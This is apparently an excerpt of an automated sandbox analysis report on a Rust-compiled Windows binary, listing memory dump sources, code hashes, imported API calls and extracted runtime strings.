                                          • Opcode Fuzzy Hash: e6f88f569e009ea383a906b11eb5c41433ef93909dce4e31778509fccc518902
                                          • Instruction Fuzzy Hash: 9C5125B3B25B34452A00DFA2BE20C676A50F75CBD4B4A7815EE8C97B45CE3CCA95E304
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9c32496ecfd97439d2b4d119587a6c7a3004efda628f329c2840494c36d5e67
                                          • Instruction ID: 1f6f754917f5495db1b4beb9665ac33c98be099d974f938e923ee48b84d20b29
                                          • Opcode Fuzzy Hash: f9c32496ecfd97439d2b4d119587a6c7a3004efda628f329c2840494c36d5e67
                                          • Instruction Fuzzy Hash: 8B413463716B188A7A50DFA2BE60567A691B71CBC4F4DB832EE4C87704CE3CD6829240
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f9bf80d8afecc9da5a1a7b24e139040353467d58a90821988d65bf6b54f1471
                                          • Instruction ID: 049e346f6864221e09c5c86e180e9107f9902f3dba61b4e16d44fb6a0afc068e
                                          • Opcode Fuzzy Hash: 0f9bf80d8afecc9da5a1a7b24e139040353467d58a90821988d65bf6b54f1471
                                          • Instruction Fuzzy Hash: B8514EA9D15FC942F313663C54032B2E3285FFB199E51E307FDD0B9E26C791AB4AA214
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30085b4081cdce905a621a0b67a6044b82c834c657b575b8f304bbe6d0fe82ad
                                          • Instruction ID: 93317bdb58836e609130506341cf4dc9ca608d95d7f439f516ab249bc41604a8
                                          • Opcode Fuzzy Hash: 30085b4081cdce905a621a0b67a6044b82c834c657b575b8f304bbe6d0fe82ad
                                          • Instruction Fuzzy Hash: 81417977F0462152FA50DB51F261A39B611E391FD0F416132CE5AA3B88CE7CD856D3A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd501bcd0fca7d58818bfe5b4041dd28b983f2d4f86e83acaaf1f1446665f536
                                          • Instruction ID: 0f365ee67e4d167d23bca431c30e61a3655f2cd2e5473675c467d0990547196c
                                          • Opcode Fuzzy Hash: cd501bcd0fca7d58818bfe5b4041dd28b983f2d4f86e83acaaf1f1446665f536
                                          • Instruction Fuzzy Hash: 0841D537A0D3C2A1FB2DDB10906277DB790ABA2B80F848579CA5E17680EE3DD449D321
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f140545ccbb1525e7f329287da5d11cb7888fdce5abd42ef7b2c71986febe68
                                          • Instruction ID: c30f19a0f8d5e0e933c6260f3b763d15a748c658284e57aea9aef803120eb6c6
                                          • Opcode Fuzzy Hash: 2f140545ccbb1525e7f329287da5d11cb7888fdce5abd42ef7b2c71986febe68
                                          • Instruction Fuzzy Hash: 2031C7E6B18F8142FE40E7A9746737BD321A7857D0F40E236DE8D9A70ADF2ED1428244
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2796ec57537121fd8b622c319fe21d7ab3bc50e34897546efa2265c3a097e548
                                          • Instruction ID: d3c8ff194a1bd24ab2172780bd59c6f2231ebfec5756abaf4a1d429444bae7bb
                                          • Opcode Fuzzy Hash: 2796ec57537121fd8b622c319fe21d7ab3bc50e34897546efa2265c3a097e548
                                          • Instruction Fuzzy Hash: 7931B8E6B18F8042FE50E7A8746737B9311A7957D0F80E236DE899A60BDF2DD1428644
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                          • Instruction ID: 787c4b4d8a21bff5eaafd5ab07b47db115d77274a5e5444b14c2a873bb014bee
                                          • Opcode Fuzzy Hash: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                          • Instruction Fuzzy Hash: 5131B737B0D3C2A1FB6DDA10902377DBA906762780FC989BDC66E17680ED2D9449D331
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          Strings
                                          • failed to spawn thread, xrefs: 00007FF73A5C90A4
                                          • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF73A5C911C
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5C90E4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: Handle$CurrentDuplicateProcess$CloseErrorLast
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$failed to spawn thread
                                          • API String ID: 120317985-263981136
                                          APIs
                                          • memset.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1124
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B114A
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B11C5
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B11DA
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1210
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1231
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1358
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: memmove$memset
                                          • String ID: assertion failed: n <= bs
                                          • API String ID: 3790616698-2139787691
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: CloseHandle$FileSleep$ErrorLastReadWritememset
                                          • String ID:
                                          • API String ID: 3673338832-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLast$FullNamePathmemcmpmemmove
                                          • String ID:
                                          • API String ID: 2319842497-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLast$FullNamePathmemcmp
                                          • String ID:
                                          • API String ID: 2929619185-0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: memmove
                                          • String ID: assertion failed: old_left_len + count <= CAPACITY
                                          • API String ID: 2162964266-323339215
                                          APIs
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5CA08E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 1956605914-1397643090
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                          • API String ID: 667068680-1826242509
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: lstrlenmemcmp
                                          • String ID: RUST_BACKTRACEfailed to write the buffered data$TryFromIntError:$called `Result::unwrap()` on an `Err` value
                                          • API String ID: 1799893992-2411252233
                                          APIs
                                          • CreateWaitableTimerExW.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF73A5AD8DE,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5B7B6A
                                          • SetWaitableTimer.KERNEL32 ref: 00007FF73A5B7BC0
                                          • WaitForSingleObject.KERNEL32 ref: 00007FF73A5B7BD2
                                          • CloseHandle.KERNEL32 ref: 00007FF73A5B7BDD
                                          • CloseHandle.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF73A5AD8DE,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5B7BED
                                          • Sleep.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF73A5AD8DE,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5B7C39
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2261246915-0
                                          APIs
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5C9DC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: Handle$CloseConsoleErrorLastMode
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 1170577072-1397643090
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 2744335978-1397643090
                                          APIs
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF73A5BCE9F), ref: 00007FF73A5BCC46
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF73A5BCE9F), ref: 00007FF73A5BCDC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: ErrorFrequencyLastPerformanceQuery
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                          • API String ID: 3362413890-3176237871
                                          APIs
                                          Strings
                                          • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF73A5BCA62
                                          • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 00007FF73A5BC920
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          Similarity
                                          • API ID: ExclusiveLock$Release$Acquire
                                          • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs
                                          • API String ID: 1021914862-480352821
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtReleaseKeyedEvent$ntdll
                                          • API String ID: 1646373207-2191064745
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtWaitForKeyedEvent$ntdll
                                          • API String ID: 1646373207-615976147
                                          APIs
                                          Similarity
                                          • API ID: ErrorLast$EnvironmentVariable
                                          • String ID:
                                          • API String ID: 2691138088-0
                                          APIs
                                          Similarity
                                          • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1956605914-0
                                          APIs
                                          Similarity
                                          • API ID: ErrorLast$FileModuleName
                                          • String ID:
                                          • API String ID: 1026760046-0
                                          APIs
                                          Similarity
                                          • API ID: ErrorLast$CurrentDirectory
                                          • String ID:
                                          • API String ID: 3993060814-0
                                          APIs
                                          Similarity
                                          • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                          • String ID:
                                          • API String ID: 3697983210-0
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ExclusiveLock$AcquireRelease
                                          • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                          • API String ID: 17069307-3513654867
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: NtCreateKeyedEvent$ntdll
                                          • API String ID: 1646373207-1373576770
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: SetThreadDescription$kernel32
                                          • API String ID: 1646373207-1950310818
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: SetThreadDescription$kernel32
                                          • API String ID: 1646373207-1950310818
                                          APIs
                                          • CancelIo.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3F9C
                                          • GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3FBE
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3FD0
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C402C
                                          Similarity
                                          • API ID: ErrorLast$CancelOverlappedResult
                                          • String ID:
                                          • API String ID: 3836860830-0
                                          APIs
                                          • CreateEventW.KERNEL32(?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3C20
                                          • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3C7D
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3CEE
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3CF4
                                          Similarity
                                          • API ID: CloseHandle$CreateErrorEventLast
                                          • String ID:
                                          • API String ID: 3743700123-0
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: Lock$AcquireExclusiveReleaseShared
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 3474408661-1397643090
                                          APIs
                                          • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF73A5DD185), ref: 00007FF73A5B7CC2
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF73A5DD185), ref: 00007FF73A5B7D39
                                          Strings
                                          • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00007FF73A5B7D6C
                                          Similarity
                                          • API ID: AddressCloseHandleWait
                                          • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyed
                                          • API String ID: 592885855-1431102515
                                          APIs
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA77E
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA82D
                                          Strings
                                          Similarity
                                          • API ID: ErrorFrequencyLastPerformanceQuery
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 3362413890-2333694755
                                          • Opcode ID: d0a4ca38f6bda699d5ce83ab1afea9c978eeb5678c858de5d9e5b502f795a194
                                          • Instruction ID: 6ec04d513d425ffe764b7efae4f41508d36f69182747838021659e5ffd60ba18
                                          • Opcode Fuzzy Hash: d0a4ca38f6bda699d5ce83ab1afea9c978eeb5678c858de5d9e5b502f795a194
                                          • Instruction Fuzzy Hash: FA316BA6F04B86A5FB14AB64A8062F5B7A6AB86790FC0C176CE5D03798CF3C9141D360
                                          APIs
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5CA326
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorGuaranteeLastStackThread
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 2304615615-1397643090
                                          • Opcode ID: 181ba004c8826d56e605718fb9483f1c33ce52e55c45f30ffd1b821f9de6fd66
                                          • Instruction ID: 43e7e5fb00d2c92ac9b71a819a89f189c6933a9c59c3e5930398b47b8ac03901
                                          • Opcode Fuzzy Hash: 181ba004c8826d56e605718fb9483f1c33ce52e55c45f30ffd1b821f9de6fd66
                                          • Instruction Fuzzy Hash: B931CF6AF10A01A9F700AB61D8422EC7B70FB86B54F948575EF9C53B98DF38D582C350
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5AD8E8,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCE72
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5AD8E8,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCEB5
                                            • Part of subcall function 00007FF73A5CA750: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA77E
                                            • Part of subcall function 00007FF73A5BCC10: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF73A5BCE9F), ref: 00007FF73A5BCC46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$Frequency$CounterErrorLast
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 361767260-2333694755
                                          • Opcode ID: 62747ca933552ee1192f10f8bb4ee3da08ea68651454a8d18092f047b71f3f22
                                          • Instruction ID: 25fdbe8da216e3cd92315db82b90ca319470e91cb9b4577d07eea083a4d08562
                                          • Opcode Fuzzy Hash: 62747ca933552ee1192f10f8bb4ee3da08ea68651454a8d18092f047b71f3f22
                                          • Instruction Fuzzy Hash: 0711AE76B04A41A9F710AB70D8476EC7730AB45314F808976DAAD03794DF38D286C390
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00007FF73A5AD8C9,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCB8E
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF73A5AD8C9,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCBA8
                                            • Part of subcall function 00007FF73A5CA750: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA77E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 158728112-2333694755
                                          • Opcode ID: af70b1b00ff7058282bb8f2d014b1edccdfc6f1fc0f508830665f8a47a9826b0
                                          • Instruction ID: 804a4419121c6ca646afaf5663a71113a0197590e03f809d86cfdfcd4c4d7eae
                                          • Opcode Fuzzy Hash: af70b1b00ff7058282bb8f2d014b1edccdfc6f1fc0f508830665f8a47a9826b0
                                          • Instruction Fuzzy Hash: 19016D3AE14A42E9F710AB70D8062FDB374BB95314F800A71DABD026D4DF38D155C3A0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
